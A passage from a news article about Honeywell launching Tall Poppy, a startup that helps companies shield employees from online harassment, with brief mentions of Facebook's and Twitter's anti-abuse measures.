Initially, Honeywell took on a year-long fellowship with the American Civil Liberties Union to pick up on work around privacy and security that had been handled by Chris Soghoian who had left to take a position with Senator Ron Wyden’s office.

But the idea for Tall Poppy remained, and once Honeywell received her green card, she was “chomping at the bit to start this company.”

A few months in the company already has businesses that have signed up for the services and tools it provides to help companies protect their employees.

Some platforms have taken small steps against online harassment. Facebook, for instance, launched an initiative to get people to upload their nude pictures  so that the social network can monitor when similar images are distributed online and contact a user to see if the distribution is consensual.

Meanwhile, Twitter has made a series of changes to its algorithm to combat online abuse.

“People were shocked and horrified that people were trying this,” Honeywell says. “[But] what is the way [harassers] can do the most damage? Sharing them to Facebook is one of the ways where they can do the most damage. It was a worthwhile experiment.”

To underscore how pervasive a problem online harassment is, out of the four companies where the company is doing business or could do business in the first month and a half there is already an issue that the company is addressing. 

“It is an important problem to work on,” says Honeywell. “My recurring realization is that the cavalry is not coming.”